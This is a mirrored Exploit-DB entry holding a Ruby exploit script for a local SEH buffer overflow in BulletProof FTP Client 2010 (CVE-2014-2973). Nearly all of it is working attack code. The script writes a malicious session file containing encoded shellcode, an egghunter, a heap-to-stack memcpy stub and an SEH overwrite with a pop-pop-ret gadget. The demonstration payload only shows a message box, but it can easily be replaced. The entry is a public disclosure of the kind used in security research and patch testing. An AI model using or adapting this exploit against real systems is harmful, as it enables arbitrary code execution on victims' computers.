BulletProof FTP Client 2010 – Local Buffer Overflow (SEH)

  • 作者: Muhamad Fadzil Ramli
    日期: 2014-12-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35449/
  • #!/usr/bin/env ruby
    # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
    # Date: Dec 03 2014
    # Vulnerability Discovery: Gabor Seljan
    # Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
    # Software Link: http://www.bpftp.com/
    # Version: 2010.75.0.76
    # Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
    # CVE: CVE-2014-2973
    # Notes: bypass stack size limitation for bigger payload. Allocate 2nd
    # shellcode in heap and copy back to stack. This exploit use egghunter
    # to locate 2nd shellcode in heap and copy to stack using memcpy function.
    
    # Offset
    seh = 93
    filename = "xsession.bps"
    buff = "A" * 400
    
    # ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby
    heap_sc =
    "w00tw00t" +
    "\xba\xaa\x8c\x8e\xda\xdb\xd3\xd9\x74\x24\xf4\x5f\x2b\xc9" +
    "\xb1\x44\x31\x57\x14\x83\xef\xfc\x03\x57\x10\x48\x79\x57" +
    "\x31\x17\x5b\x1c\xe2\xd3\x6d\x0f\x58\x6c\xbf\x66\xf9\x19" +
    "\xce\x48\x89\x6b\x3d\x22\xfb\x8f\xb6\x72\x0c\x24\xb6\x5a" +
    "\x87\x0c\x7f\xd4\x8f\x05\x8c\xb3\xae\x34\x8d\xa5\xd1\x3d" +
    "\x1e\x02\x36\xca\x9a\x76\xbd\x98\x0c\xff\xc0\xca\xc6\xb5" +
    "\xda\x81\x83\x69\xda\x7e\xd0\x5e\x95\x0b\x23\x14\x24\xe5" +
    "\x7d\xd5\x16\x39\x81\x85\xdd\x79\x0e\xd1\x1c\xb6\xe2\xdc" +
    "\x59\xa3\x09\xe5\x19\x17\xda\x6f\x03\xdc\x40\xb4\xc2\x09" +
    "\x12\x3f\xc8\x86\x50\x65\xcd\x19\x8c\x11\xe9\x92\x53\xce" +
    "\x7b\xe0\x77\x12\x1d\x2b\xc5\x22\xf4\x7f\xa3\xd6\x8f\xbd" +
    "\xdc\x96\xde\x4f\xf1\xf5\x36\xd0\xf6\x05\x39\x67\x4d\xfe" +
    "\x7d\x09\x96\x1c\xf2\x72\x3a\xc5\xa7\x94\xcd\xfa\xb7\x9b" +
    "\x5b\x41\x40\x0b\x30\x26\x70\x8a\xa0\x85\x42\x22\x55\x82" +
    "\xd7\x49\xf0\x20\x90\xf1\xde\xce\x29\xef\x49\x30\x7c\xeb" +
    "\xfc\x0c\x2f\x48\x56\x32\x9d\x12\x20\x2f\x3a\x38\xc7\x31" +
    "\xbd\x43\xe8\xda\x2e\xc3\x4f\x3b\xd9\x52\x17\x5e\x5b\xfc" +
    "\x9a\xc5\x28\x8f\x15\xdd\x47\x33\x72\xeb\xde\x28\x12\xb3" +
    "\xc0\x8e\xc3\x2b\x75\xe3\x47\xee\x1d\x8b\x2b\x81\xb4\x03" +
    "\xdb\x7d\x02\xab\x4b\x36\xe9\x27\xe0\xf7\x38\x3f\xb4\xd3" +
    "\xaa\xb6\xa4\x2d\x19\x9a\x75\x1f\xcf\xe5\xaa\xae\x2f\x49" +
    "\xb4\x84\xa7"
    
    # badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2'
    # only locate 1st heap address :P
    heap_addr =
    "\x50" + # push eax
    "\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh
    "\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777fh
    "\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx]
    "\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh
    "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh
    "\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx]
    "\x8b\x1b" #mov ebx,dword ptr [ebx]
    
    egghunter =
    "\x8b\xd3\xeb\x05" + # mov edx,ebx # jmp $+7h
    "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e" +
    "\x3c\x05\x5a\x74\xef\xb8" +
    "\x77\x30\x30\x74" + # our tag 'w00t'
    "\x8b\xfa\xaf\x75\xea\xaf" +
    "\x75\xe7"
    
    memcpy_func =
    "\x58" + # pop eax # esp
    "\x81\xc4\x54\xf2\xff\xff" + # add esp,-3500
    "\xb9\xef\xe6\x3b\xef" + # mov ecx,0xef3be6ef
    "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
    "\x89\x08" + # mov [eax],ecx # memcpy() static address
    "\x89\xc1" + # mov ecx,eax
    "\x83\xc1\x10" + # add ecx,10h
    "\x89\x48\x04" + # mov [eax+4h],ecx # void *dest
    "\x89\x48\x08" + # mov [eax+8h],ecx # void *dest
    "\x89\x78\x0c" + # mov [eax+0ch],edi # const wchar_t *src (shellcode)
    "\xb9\x8d\x79\x77\x77" + # mov ecx,0x7777798d
    "\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
    "\x89\x48\x10" + # mov [eax+10h],ecx # size_t count
    "\x94\xc3" # xchg eax,esp # retn
    
    stack_sc = heap_addr + egghunter + memcpy_func
    
    # GetPC
    buff[1,2] = "\xd9\xeb"# fldpi
    buff[3,5] = "\x9b\xd9\x74\x24\xf4"# fstenv [esp-0xc]
    buff[8,1] = "\x58" # pop eax# pop esp into eax
    
    # FixRet stub 
    buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45"# (1)
    buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp
    buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr
    
    buff[30,stack_sc.size] = stack_sc
    
    # restore 1st shellcode
    buff[12,4] = buff[seh-24,4] # replace with original sc (1)
    buff[19,4] = buff[seh-4,4]# replace with original sc (2)
    buff[26,4] = buff[seh,4]# replace with original sc (3)
    
    buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166
    buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null
    
    bps =
    "\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" +
    "\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" +
    "\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" +
    "\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" +
    "\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" +
    "\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" +
    "\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" +
    buff + "\x0D\x0A\x61\x6E" +
    "\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" +
    "\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" +
    "\x0A"
    
    File.open(filename,"wb") do |fp|
    fp.write(bps)
    puts "Exploit file: #{filename} size: #{bps.size}"
    fp.close
    end